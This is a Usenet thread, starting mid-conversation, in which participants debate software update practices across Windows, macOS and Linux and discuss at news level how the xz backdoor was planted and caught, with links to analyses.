    and they are dependencies of the programs you may know like firefox,
    chromium, ...
    If a program is listed, it tend to be about a security fix or minor improvements that affects stability and speed (keep in mind that a bug
    can also be introduced for it's a human who has written the code).
    Of course if you like me prefer a rollin-release-distro, then updates
    may bring new features and new dependencies, but I trust my distro
    maintainers to have an eye on what is good and safe, so I don't care to
    look at what changes for each package at each time, but I could just
    take a look at the change log for each package as my favorite distro do provide that as metadata.


    I didn't
    agree to be a beta testing volunteer for programmers who
    can't stop fiddling. I'm guessing they may spend more time
    rebuilding the install package than actually writing the software.)

    then you need to find an EOL distribution of ms-windows version and live
    with that there will not be any fixes for what ever vulnerability there
    may be found.


    The way it used to work is that software was thoroughly
    tested before release.

    Haha... yeah sure, never been the case, if even a QA-testing before it
    tend to be just the new feature and seldom the whole application, so
    things can easily break like when ms released the new version of "teams"
    and they broke spellchecking.


    Then another version might come out
    in maybe a year.

    This was in the times when no one was concerned about vulnerabilities, clueless about things like OWASP Top 10, the world has changed a lot
    since the 20th century, now the bad boys tend to know about application vulnerabilities faster than the developers, when methods of detecting of
    bad code has evolved (static analyzes, LLM, auto testing, ...), then a
    random vulnerabilities ain't enough, then you need to create
    vulnerabilities and organized actors try to get their code into
    application in different manners like hack repositories and inject their
    code, get employment at different companies or agencies or joining open
    source developments.

    You can't go around with software with a known vulnerability for a year,
    not even a week...

    And one could easily find a list of
    actual changes in the new version.

    Most open source projects do hand a change.log which tells you about
    what is new in each version. There are some closed source projects that
    do the same too.


    Most of my Windows software
    hasn't been updated in ages and still works fine.

    yeah, they do work, but with all the vulnerabilities you are also an
    easy target which your firewall will not protect you from.


    But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    Apple is a different thing. They serve a consumer-only audience,
    updating periodically with stable releases and quickly dropping
    support for older products.

    Apple and microsoft has the same release policy, monthly updates unless something really critical then out of cycle releases.

    Both don't talk about vulnerabilities until they have released a fix, so
    in theory you can have a vulnerability for 10 years which they know of
    and haven't bothered to fix for they think it's of low impact but may
    already be utilized in hacks.




    If someone screws up and needs to issue a fix, that's fine.
    But it shouldn't happen very often. An OS on a computer that's
    actually in use shouldn't be getting dripfeed updates.

    This is why peoples devices gets to be part of large botnets, for they
    ignore security in the same way that MAGA ignores that mr tinyhands
    wants a bloodbath in US.


    > It should
    be getting updates rarely and then with good reason. MS know that.
    That's why they let corporate customers update periodically and
    test out the changes before rolling them out.

    They know that people are annoyed by rebooting their computer each time
    there is an update and as I told you before in ms-windows a file is
    locked it is locked and can't be replaced until the application which
    uses it has closed it, and as the kernel has opened files that needs to
    be replaced, the kernel can't be up and running in full to finish a
    update, so you need to reboot.

    This differs from Unix and Linux where two version of a file can exists
    at the same time, so after an update all you need to do is restart the applications that has the older version loaded (that what suse tells you
    after an update) and with live patching of the kernel you can even avoid
    the reboot when you have a kernel update.

    Please don't be stupid, keep your stuff up to date, it's not about you,
    but it's about everyone else as when you are part of a botnet everyone
    else will be affected of your bad decisions.
    --
    //Aho

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From =?UTF-8?B?YmFk8J+SvXNlY3Rvcg==?=@forgetski@_INVALID.net to alt.os.linux on Mon Apr 1 07:46:38 2024
    From Newsgroup: alt.os.linux

    On 4/1/24 05:01, Mickey D wrote:
    On Sun, 31 Mar 2024 10:50:58 +0530, Indira wrote:

    Was it an insider who did it, or an outsider (China perhaps, for example)?

    Who did it?

    Your mum. Just kidding, it was GCHQ in Cheltnam. Just kidding, it was
    Russia. Just kidding, it was China. Just kidding, it was America. Just kidding, it was definitely your mum.

    How advanced was the threat actor?

    The backdoor attempt was a very serious one, with a very high bar of knowledge, research, development and tradecraft to reach this far into the Linux ecosystem. Additionally, changes made by the threat actor on Github span multiple years,


    Picasso said that computers are useless because they only give us
    answers so my first two questions would be

    - when did Gates first call Linux a 'cancer'

    - when did he first coin Triple-E as his 'final solution'?


    and include things like introducing functions
    incompatible with OSS Fuzzer due to outstanding small issues since 2015,
    then getting OSS Fuzzer to exclude XZ Utils from scanning last year. The backdoor itself is super well put together, and even includes the ability
    to remotely deactivate and remove the backdoor via a kill command.

    https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd

    Smart, but realistically speaking how stupid does one have to be to
    imagine that the stunt could last without being discovered? My bet
    excludes intelligence services or anyone with more than 2 watts of
    deployable bandwidth, leaving (fill-in with anti-Linux victims of Linux
    and/or their moles).
    --
    “Wish in one hand, shit in the other, see which one fills up first.” Stephen King, The Dark Tower




    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Chris@ithinkiam@gmail.com to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 13:08:39 2024
    From Newsgroup: alt.os.linux

    On 31/03/2024 19:17, Newyana2 wrote:
    "J.O. Aho" <user@example.net> wrote

    | > The
    | > whole approach is a ridiculous mess. How could quality control
    | > possibly be carried out on so many constant changes?
    |
    | Quite simple, most open source projects can get free static code
    | inspection (this can be automated say when a pull request is made), a
    | review is always needed before code are merged (how good it is depends
    | on the maintainers, all from sloppy microsoft standard to BSD high
    | standard) . This is the same way as most closed source projects also are
    | done.
    |

    I don't see it as a closed vs open issue. Microsoft
    now do the same dripfeed updating. Essentially, the
    SOHo customer base are now an unpaid beta testing
    army.

    I've had to make efforts to block these unknown updates
    in both Win10 and Suse. (And yes, it is in the 100s. I had
    my firewall down briefly after a week or two when Suse couldn't
    call home. It told me I had 360 updates waiting. What are
    they? Who knows. Most of the ames are not informative, even
    if I wanted to look through 360 updates.

    Linux package updates are pretty informative. Especially if you want to differentiate between feature updates and bug fixes or security updates.

    It's nuts. I didn't
    agree to be a beta testing volunteer for programmers who
    can't stop fiddling. I'm guessing they may spend more time
    rebuilding the install package than actually writing the software.)

    You'd guess wrong.

    The way it used to work is that software was thoroughly
    tested before release. Then another version might come out
    in maybe a year.

    There's a reason why that doesn't happen anymore: it sucked. That was
    the WinXP model which ultimately failed catastrophically (see WannaCry).
    You had to wait until the next Service Pack in order to secure your OS
    which may have been vulnerable for several months.

    t that point people might try it out, or they
    might wait for reviews. And one could easily find a list of
    actual changes in the new version. Most of my Windows software
    hasn't been updated in ages and still works fine. But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    Apple is a different thing. They serve a consumer-only audience,

    That's simply not true. There are whole professional industries which
    are Apple-centric.

    updating periodically with stable releases and

    Security updates can happen at any time. Since release of the latest
    version of macOS in September there have been nine updates, with five
    being security/vulnerability specific releases.

    quickly dropping
    support for older products.

    Which from a security standpoint works very well. Apple long ago stopped selling OS updates - which Microsoft still kinda does - as it made sense
    to have as many users as possible on the latest and most up-to-date OS version.

    Charging for updates means users won't update in a timely manner and
    that leaves MS with the headache of having to support multiple versions concurrently which is expensive and inefficient.

    Their aim is to sell a lot of very
    dependable devices to a tech-illiterate customer base, which is
    a different business model.

    If someone screws up and needs to issue a fix, that's fine.
    But it shouldn't happen very often. An OS on a computer that's
    actually in use shouldn't be getting dripfeed updates.

    Of course it should. The bad model is that all updates need a reboot
    (e.g. windows and macOS), whereas in linux most updates can happen in
    the background with the system still running.

    It should
    be getting updates rarely and then with good reason. MS know that.
    That's why they let corporate customers update periodically and
    test out the changes before rolling them out.

    And corporate customers apply them as they're released. The cost of
    internally verifying them and thereby delay applying highly critical vulnerabilities is not worth it. Can you imagine the damage to
    reputation if Corp X was victim of a 0-zero day vulnerability and held
    to ransom simply because they chose not to apply a patch in a timely
    manner?

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 15:09:08 2024
    From Newsgroup: alt.os.linux

    On 2024-03-31 23:54, Newyana2 wrote:
    "Carlos E.R." <robin_listas@es.invalid> wrote

    | > The way it used to work is that software was thoroughly
    | > tested before release. Then another version might come out
    | > in maybe a year. At that point people might try it out, or they
    | > might wait for reviews. And one could easily find a list of
    | > actual changes in the new version. Most of my Windows software
    | > hasn't been updated in ages and still works fine. But Microsoft and
    | > Linux are now both guilty of seat-of-the-pants updating. If it
    | > isn't stopped, Windows will show a message at boot every few
    | > days: "Please wait. Installing updates."
    |
    | You should read "The cathedral and the bazaar".
    |
    That's addressing how to develop software. But then there's
    the point at which the software is done, thoroughly tested,
    and put to use. It needs to be well designed and stable. It
    needs to do what people need. Then it needs to stay put.

    Software is never done.


    Software shouldn't be a sexy business, with constant redesign.
    What happens more often than not in the Linux world might
    be called the greasemonkey syndrome. That's the case where
    someone has a car on his front lawn and continually works
    on tuning it up, adding scoops, and so on. He never quite gets
    around to driving the car. He just likes to tinker.

    For all Microsoft's faults, there's the advantage that their business depends on business users. So Windows has to be stable, it has to
    have a well documented API, and backward compatibility is critical
    because businesses build their own inhouse software. I can write
    software today on Windows that runs on every Windows machine in
    the world, with no support files needed. With Macs one gets 2-3
    years backard compatibility. With Linux it's a moving target. I'm
    still using a 25 year old Paint Shop Pro on my 23 year old WinXP.
    I'm still using current Firefox on 14 year old Win7. I had to update
    my 4 year old Raspberry Pi OS because it couldn't run the latest
    Chromium. It could only run Chromium 92, released in 2021. The
    whole thing has to be periodically replaced.

    You forget that the money in the Linux world is precisely in the
    business user. And those distributions were not affected by this vulnerability.
    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 15:20:35 2024
    From Newsgroup: alt.os.linux

    On 2024-04-01 10:51, Bugsy wrote:
    "Carlos E.R." <robin_listas@es.invalid> wrote:

    Bad actor probably paid by some country or mafia with money and resources. >>
    https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor

    Very sophisticated. Their grand scheme was:

    1) sneakily backdoor the release tarballs, but not the source code

    Wrong. The source code of xz was compromised.
    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Carlos E.R.@robin_listas@es.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 15:19:15 2024
    From Newsgroup: alt.os.linux

    On 2024-04-01 13:21, J.O. Aho wrote:
    On 31/03/2024 20.17, Newyana2 wrote:
    "J.O. Aho" <user@example.net> wrote

    | > The
    | > whole approach is a ridiculous mess. How could quality control
    | > possibly be carried out on so many constant changes?
    |
    | Quite simple, most open source projects can get free static code
    | inspection (this can be automated say when a pull request is made), a
    | review is always needed before code are merged (how good it is depends
    | on the maintainers, all from sloppy microsoft standard to BSD high
    | standard) . This is the same way as most closed source projects also
    are
    | done.
    |

       I don't see it as a closed vs open issue. Microsoft
    now do the same dripfeed updating. Essentially, the
    SOHo customer base are now an unpaid beta testing
    army.

    That was the feeling one got reading, bashing on open source development model, which in reality don't be that much different from remote working setups with the exception that developers not gone trough a silly
    interview.


       I've had to make efforts to block these unknown updates
    in both Win10 and Suse.

    In microsoft updates you can't opt out from specific updates, everything
    is bundled together, while for example with Suse you can block specific packages from being updated (in the long run you may get a dependency
    issue, not my problem).

    ; (And yes, it is in the 100s. I had
    my firewall down briefly after a week or two when Suse couldn't
    call home.

    What you call for calling home for Suse is just a fetch of the latest
    status on what packages exists in the remote repository and some
    metadata, so it's one way communication, sure the remote end could store your IP and which repository you was fetching from.

    And you'd have to consider that the download happens from multiple
    servers hosted by independent sites the world over. In the case of
    openSUSE they can not even obtain reliable detailed stats on the users.

    Anyway, it is open, you can find out what the infrastructure does. There
    is no evil.


    It's on your local system that the calculation is done which packages
    are needed to be installed to get everything up to latest version.

    This differs much from the microsoft way, which you tell everything to microsoft and they tell you what to install.

    Right.


    ...

    Please don't be stupid, keep your stuff up to date, it's not about you,
    but it's about everyone else as when you are part of a botnet everyone
    else will be affected of your bad decisions.

    +1
    --
    Cheers, Carlos.

    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Newyana2@Newyana2@invalid.nospam to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 09:24:32 2024
    From Newsgroup: alt.os.linux

    "J.O. Aho" <user@example.net> wrote

    | Please don't be stupid, keep your stuff up to date, it's not about you,
    | but it's about everyone else as when you are part of a botnet everyone
    | else will be affected of your bad decisions.
    |

    Now that you mention it, that sounds like good advice.
    I am too stupid to manage security on my computer. I'm
    not even a Linux engineer. So I'll do as you recommend.
    I think my compression libs are out of date and I've heard
    there's a nifty one called "xz". Maybe I'll get that. When do
    you advise me to update it again? This afternoon? Or is
    tonight good enough? :)


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Newyana2@Newyana2@invalid.nospam to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 10:01:36 2024
    From Newsgroup: alt.os.linux

    "Carlos E.R." <robin_listas@es.invalid> wrote

    | > That's addressing how to develop software. But then there's
    | > the point at which the software is done, thoroughly tested,
    | > and put to use. It needs to be well designed and stable. It
    | > needs to do what people need. Then it needs to stay put.
    |
    | Software is never done.
    |

    The normalization of that view is what's led to the acceptance
    of a seat-of-the-pants rolling beta approach. Your statement
    has no context. A lot of software is more than done. If the
    software does what you need and it's stable, why would you
    dump it for something else? The software I use is done. Much
    of it is 25 years old. It works dependably. It doesn't need
    security patches.

    J.O. makes a valid case for security with software that goes online.
    OK. (Even though that's rather ironic in this particular thread.)
    But security isn't just a matter of putting fingers in the dike once
    a week. It's about making a solid product in the first place and
    then dealing with risk.

    For instance, Firefox updates about every 10 days. Why?
    They're trying to keep up with Chrome. They have developers
    who need to get paid. They need to justify spending $500
    million/year. And, yes, there are security patches. So, many of
    the reasons for updates are not legit. The result is a wildly
    bloated mess with settings like musical chairs and a prefs
    file that hasn't been properly cleaned up since Netscape. It
    just keeps growing, full of indecipherable and largely
    undocumented settings. That's rolling beta.

    At the same time, Mozilla can't be held fully accountable for
    online security. It's not just about making sure they patch the
    latest 0-day. The entire medium of networking and online
    functionality is faulty.
    We're accepting high-risk script and remote communication
    for frictionless shopping and datamining. A lot of pages I visit now
    show me a message that "javascript is required for this app." Yes.
    Javascript from a dozen sources. That's not a webpage. It's
    a medium-sized, obfuscated, executable software program that
    I'm expected to download and run... Pretending that it's about
    getting the latest patch is not being willing to face the problem.

    Today at Slashdot there's an article about how 73 million
    AT&T customers have had their account info and personal data
    posted on the so-called dark web. The data is 5 years old, but
    most of it is likely still valid. How did it get stolen? They don't
    know. But AT&T clearly have that database internet-connected,
    and their "business partners" have access. So how could the
    data NOT be stolen? These kinds of reports come out almost
    daily. Then people mutter about more salt and pepper needed.
    The solution is not technical. It's logistical.

    When will we really look at that? What will it take? What if
    some teenager manages to cause a 3,700 car pile-up on July
    4th weekend by hacking into car telematics? Would that make
    us think twice, or will everyone just talk about how we need
    to fix the vulnerability that the teenager exploited? What will
    it take to see that cars should not be network connected and
    things that are network-connected should not be executing
    remote code?


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From J.O. Aho@user@example.net to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 16:20:00 2024
    From Newsgroup: alt.os.linux

    On 01/04/2024 15.24, Newyana2 wrote:
    "J.O. Aho" <user@example.net> wrote

    | Please don't be stupid, keep your stuff up to date, it's not about you,
    | but it's about everyone else as when you are part of a botnet everyone
    | else will be affected of your bad decisions.
    |

    Now that you mention it, that sounds like good advice.
    I am too stupid to manage security on my computer. I'm
    not even a Linux engineer. So I'll do as you recommend.
    I think my compression libs are out of date and I've heard
    there's a nifty one called "xz". Maybe I'll get that. When do
    you advise me to update it again? This afternoon? Or is
    tonight good enough? :)

    So you think CVE-2008-5424 and CVE-2010-3147 are good to have?
    There is less risk of using the compromised xz tarball than using your
    current ms-windows, at least xz needs specific conditions to cause the authentication in sshd.
    --
    //Aho
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From J.O. Aho@user@example.net to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 16:31:52 2024
    From Newsgroup: alt.os.linux

    On 01/04/2024 16.01, Newyana2 wrote:
    "Carlos E.R." <robin_listas@es.invalid> wrote

    | > That's addressing how to develop software. But then there's
    | > the point at which the software is done, thoroughly tested,
    | > and put to use. It needs to be well designed and stable. It
    | > needs to do what people need. Then it needs to stay put.
    |
    | Software is never done.
    |

    The normalization of that view is what's led to the acceptance
    of a seat-of-the-pants rolling beta approach. Your statement
    has no context. A lot of software is more than done. If the
    software does what you need and it's stable, why would you
    dump it for something else?

    You talking about software that has been abandoned by the developers?


    The software I use is done. Much
    of it is 25 years old. It works dependably. It doesn't need
    security patches.

    There is no security patches for the software is abandoned, but has vulnerabilities.


    J.O. makes a valid case for security with software that goes online.
    OK. (Even though that's rather ironic in this particular thread.)
    But security isn't just a matter of putting fingers in the dike once
    a week. It's about making a solid product in the first place and
    then dealing with risk.

    For instance, Firefox updates about every 10 days. Why?

    The web standard is evolving and of course the attack vectors too, so
    there are a request for updates and people tend to have more privacy, so
    that kind of features needs to be implemented in a way so that it don't
    break the user experience. Also code optimization is an important thing,
    you don't want to have the modem speed experience while online on a
    high-speed connection.

    If you don't want to update as often, there is the ESR.
    --
    //Aho


    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From candycanearter07@candycanearter07@candycanearter07.nomail.afraid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 14:40:10 2024
    From Newsgroup: alt.os.linux

    ["Followup-To:" header set to alt.os.linux.]
    Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
    Newyana2 <Newyana2@invalid.nospam> wrote:
    [...]

    But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    With "every few days" actually being *a month* and you only get a
    "Please wait." message if you're stupid enough not to set your 'Active hours'.

    And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.

    [...]


    I think I've heard of Windows ignoring that sometimes.
    --
    user <candycane> is generated from /dev/urandom
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From candycanearter07@candycanearter07@candycanearter07.nomail.afraid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 14:40:12 2024
    From Newsgroup: alt.os.linux

    ["Followup-To:" header set to alt.os.linux.]
    Larry Wolff <larrywolff@larrywolff.net> wrote at 09:05 this Monday (GMT):
    On 3/31/2024 2:11 PM, Lew Pitcher wrote:
    [snip]
    Vegard Nossum wrote a script to detect if it's likely that the ssh binary
    on a
    system is vulnerable, attached here. Thanks!


    Greetings,

    Andres Freund

    View attachment "injected.txt" of type "text/plain" (8236 bytes)

    Download attachment "liblzma_la-crc64-fast.o.gz" of type "application/gzip" (36487 bytes)

    Download attachment "detect.sh" of type "application/x-sh" (426 bytes) Powered by blists - more mailing lists

    Please check out the Open Source Software Security Wiki, which is
    counterpart to this mailing list.

    Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your


    Hi, the server I am using strips binaries. Would it be possible to
    provide a link?
    --
    user <candycane> is generated from /dev/urandom
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Frank Slootweg@this@ddress.is.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 15:19:14 2024
    From Newsgroup: alt.os.linux

    Chris <ithinkiam@gmail.com> wrote:
    On 31/03/2024 19:17, Newyana2 wrote:
    [...]

    [About Apple:]

    quickly dropping
    support for older products.

    Which from a security standpoint works very well. Apple long ago stopped selling OS updates - which Microsoft still kinda does - as it made sense
    to have as many users as possible on the latest and most up-to-date OS version.

    Maybe you can still buy some Microsoft Windows upgrades for some niche
    corner cases, but effectively all Windows upgrades have been free, ever
    since Windows 7 (2009!), till today (Windows 11).

    Of course you can still buy full licenses, for systems which come
    without one, but those are not upgrades.

    Charging for updates means users won't update in a timely manner and
    that leaves MS with the headache of having to support multiple versions concurrently which is expensive and inefficient.

    Aside from Microsoft not charging for upgrades or updates, Wikipedia
    tells me that Apple also still supports three versions of macOS (12, 13
    and 14), with - I'm sure - their subversions, while Microsoft supports
    two Windows versions (10 and 11), with - to some extent - their
    subversions. So I don't think Apple and Microsoft are all that
    different in this respect. (Only the number of years spanning those
    versions is much shorter for Apple than for Microsoft (less than 3
    versus nearly 9).)

    <https://en.wikipedia.org/wiki/MacOS_version_history#Releases>

    [...]
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Frank Slootweg@this@ddress.is.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 15:48:28 2024
    From Newsgroup: alt.os.linux

    candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
    ["Followup-To:" header set to alt.os.linux.]

    Ignored, because this is about Windows. (Not to mention that
    'Followup-To:' is nearly always inappropriate.)

    Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
    Newyana2 <Newyana2@invalid.nospam> wrote:
    [...]

    But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    With "every few days" actually being *a month* and you only get a
    "Please wait." message if you're stupid enough not to set your 'Active hours'.

    And "at boot every few days"!? My system is up from one monthly update cycle to the next, no silly business with booting in between.

    [...]

    I think I've heard of Windows ignoring that sometimes.

    I think you've heard wrong. Never happened to me (for two systems,
    Windows 10 and 11) and I can't think of a scenario where it (your set
    'Active hours') could be ignored.

    You also can set Windows Update to pause for 1, 2, 3, 4 or 5 weeks and
    you can reset that pause before it runs out, so you can pause
    indefinitely.
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From candycanearter07@candycanearter07@candycanearter07.nomail.afraid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 16:00:08 2024
    From Newsgroup: alt.os.linux

    Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT):
    candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
    ["Followup-To:" header set to alt.os.linux.]

    Ignored, because this is about Windows. (Not to mention that
    'Followup-To:' is nearly always inappropriate.)

    I've been told the opposite..

    Frank Slootweg <this@ddress.is.invalid> wrote at 18:57 this Sunday (GMT):
    Newyana2 <Newyana2@invalid.nospam> wrote:
    [...]

    But Microsoft and
    Linux are now both guilty of seat-of-the-pants updating. If it
    isn't stopped, Windows will show a message at boot every few
    days: "Please wait. Installing updates."

    With "every few days" actually being *a month* and you only get a
    "Please wait." message if you're stupid enough not to set your 'Active
    hours'.

    And "at boot every few days"!? My system is up from one monthly update >> > cycle to the next, no silly business with booting in between.

    [...]

    I think I've heard of Windows ignoring that sometimes.

    I think you've heard wrong. Never happened to me (for two systems,
    Windows 10 and 11) and I can't think of a scenario where it (your set
    'Active hours') could be ignored.

    You also can set Windows Update to pause for 1, 2, 3, 4 or 5 weeks and
    you can reset that pause before it runs out, so you can pause
    indefinitely.


    Oh.
    --
    user <candycane> is generated from /dev/urandom
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Gelato@gelato@.is.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 12:02:16 2024
    From Newsgroup: alt.os.linux

    On Mon, 1 Apr 2024 15:20:35 +0200, Carlos E.R. wrote:

    Bad actor probably paid by some country or mafia with money and resources. >>>
    https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor

    Very sophisticated. Their grand scheme was:

    1) sneakily backdoor the release tarballs, but not the source code

    Wrong. The source code of xz was compromised.

    Read that reference again, and read the other references. https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor

    It was sneaky. Very sneaky.
    It wasn't in the source code.

    It was in the packaging/testing code. https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd
    "The upstream xz repository and the xz tarballs have been backdoored."
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Chris@ithinkiam@gmail.com to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 18:34:08 2024
    From Newsgroup: alt.os.linux

    On 01/04/2024 16:19, Frank Slootweg wrote:
    Chris <ithinkiam@gmail.com> wrote:
    On 31/03/2024 19:17, Newyana2 wrote:
    [...]

    [About Apple:]

    quickly dropping
    support for older products.

    Which from a security standpoint works very well. Apple long ago stopped
    selling OS updates - which Microsoft still kinda does - as it made sense
    to have as many users as possible on the latest and most up-to-date OS
    version.

    Maybe you can still buy some Microsoft Windows upgrades for some niche corner cases, but effectively all Windows upgrades have been free, ever
    since Windows 7 (2009!), till today (Windows 11).

    I thought the upgrade to 10 from 7/8 was only free for a while? It also certainly wasn't "transparent" upgrade.

    Of course you can still buy full licenses, for systems which come
    without one, but those are not upgrades.

    Although, anyone can use Win10 for free as long as they ignore the
    subtle 'nag' from MS. No idea why they still charge so much for Windows.
    Maybe it's so they can justify the costs to OEMs?

    Charging for updates means users won't update in a timely manner and
    that leaves MS with the headache of having to support multiple versions
    concurrently which is expensive and inefficient.

    Aside from Microsoft not charging for upgrades or updates, Wikipedia
    tells me that Apple also still supports three versions of macOS (12, 13
    and 14),

    12 & 13 are only supported with security updates.

    with - I'm sure - their subversions,

    There is only ever one fully supported version of macOS: the most recent feature version.

    There's no equivalent to the Win10/11 21Hn or 22Hn or whatever they
    are/were called.

    while Microsoft supports
    two Windows versions (10 and 11), with - to some extent - their
    subversions. So I don't think Apple and Microsoft are all that
    different in this respect. (Only the number of years spanning those
    versions is much shorter for Apple than for Microsoft (less than 3
    versus nearly 9).)

    The macOS versions are much more similar to each other than Windows
    10/11 and like I said above the level of support for 12 & 13 is low.

    I'd also argue that Windows has five versions - although two have
    recently gone EOL - Win10 21H2, 22H2, Win11 21H2, 22H2, 23H2. Then there
    are the enterprise versions.

    I think the biggest difference is that macOS users quickly transition to
    the latest version as it's released: https://www.statista.com/statistics/944559/worldwide-macos-version-market-share/[1]

    Whereas windows users like to stick with what they know and Win10 is
    still the dominant version with >60% with a mishmash of subversions.

    [1] this has highlighted a funny quirk that so many websites can't parse
    a macOS user agent version that starts with anything other than 10.x
    that ever since the relase of macOS 11 all Macs are reporting the same
    UA which is frozen at 10.15. https://bugzilla.mozilla.org/show_bug.cgi?id=1679929
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Frank Slootweg@this@ddress.is.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 18:06:35 2024
    From Newsgroup: alt.os.linux

    candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
    Frank Slootweg <this@ddress.is.invalid> wrote at 15:48 this Monday (GMT):
    candycanearter07 <candycanearter07@candycanearter07.nomail.afraid> wrote:
    ["Followup-To:" header set to alt.os.linux.]

    Ignored, because this is about Windows. (Not to mention that 'Followup-To:' is nearly always inappropriate.)

    I've been told the opposite..

    That's another wrong thing you've been told! :-)

    I won't go in all the situations where it's wrong, but will just take
    this example.

    If I had honoured your 'Followup-To:', I would not see any responses,
    i.e. also not any responses to *my own* response (which is, as I said,
    about Windows, *not* Linux), because I'm not subscribed to alt.os.linux.

    So you were effectively forcing me - *and* any other user who is not subscribed to alt.os.linux - to subscribe, just because you think it's
    the good thing to do.

    I hope you realize how inconsiderate and rude that is.

    Also a 'Followup-To: alt.comp.os.windows-10' would have been
    inappropriate, because you cut off any subscribers of alt.os.linux, who
    might be interested in further responses.

    Bottom line: Do *not* use 'Followup-To:'.

    [...]
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From Frank Slootweg@this@ddress.is.invalid to alt.comp.os.windows-10,alt.os.linux on Mon Apr 1 18:36:38 2024
    From Newsgroup: alt.os.linux

    Chris <ithinkiam@gmail.com> wrote:
    On 01/04/2024 16:19, Frank Slootweg wrote:
    Chris <ithinkiam@gmail.com> wrote:
    On 31/03/2024 19:17, Newyana2 wrote:
    [...]

    [About Apple:]

    quickly dropping
    support for older products.

    Which from a security standpoint works very well. Apple long ago stopped >> selling OS updates - which Microsoft still kinda does - as it made sense >> to have as many users as possible on the latest and most up-to-date OS
    version.

    Maybe you can still buy some Microsoft Windows upgrades for some niche corner cases, but effectively all Windows upgrades have been free, ever since Windows 7 (2009!), till today (Windows 11).

    I thought the upgrade to 10 from 7/8 was only free for a while? It also certainly wasn't "transparent" upgrade.

    Yes, Microsoft has been sending mixed messages about this and there
    may have been gaps when the previous free period was over and the next
    free period was not yet there. After all, one can't use Microsoft and consistent in one sentence, can one!? :-) Anyway, my wife's 8.1 to 10
    upgrade was done in March 2023, nearly 8 years after release of 10, and
    was free.

    Of course you can still buy full licenses, for systems which come without one, but those are not upgrades.

    Although, anyone can use Win10 for free as long as they ignore the
    subtle 'nag' from MS. No idea why they still charge so much for Windows. Maybe it's so they can justify the costs to OEMs?

    I only bought Windows 1.0 (the 386 version), never since.

    [Details on difference between macOS and Windows update/support cycles. Thanks!!]

    I think the biggest difference is that macOS users quickly transition to
    the latest version as it's released: https://www.statista.com/statistics/944559/worldwide-macos-version-market-share/[1]

    Whereas windows users like to stick with what they know and Win10 is
    still the dominant version with >60% with a mishmash of subversions.

    [1] this has highlighted a funny quirk that so many websites can't parse
    a macOS user agent version that starts with anything other than 10.x
    that ever since the relase of macOS 11 all Macs are reporting the same
    UA which is frozen at 10.15. https://bugzilla.mozilla.org/show_bug.cgi?id=1679929

    Well, you'll see that my 'User-Agent:' header also says "NT-10.0-WOW",
    while I'm running Windows 11. That's because the kernel is mostly
    unchanged and reports "10.0....". I don't know what webbrowsers (can)
    see.
    --- Synchronet 3.20a-Linux NewsLink 1.114
  • From John Hasler@john@sugarbit.com to alt.os.linux on Mon Apr 1 13:47:27 2024
    From Newsgroup: alt.os.linux

    badsector writes:
    when did Gates first call Linux a 'cancer'

    That was Ballmer. He was evidently terrified of Linux.
    --
    John Hasler
    john@sugarbit.com
    Dancing Horse Hill
    Elmwood, WI USA
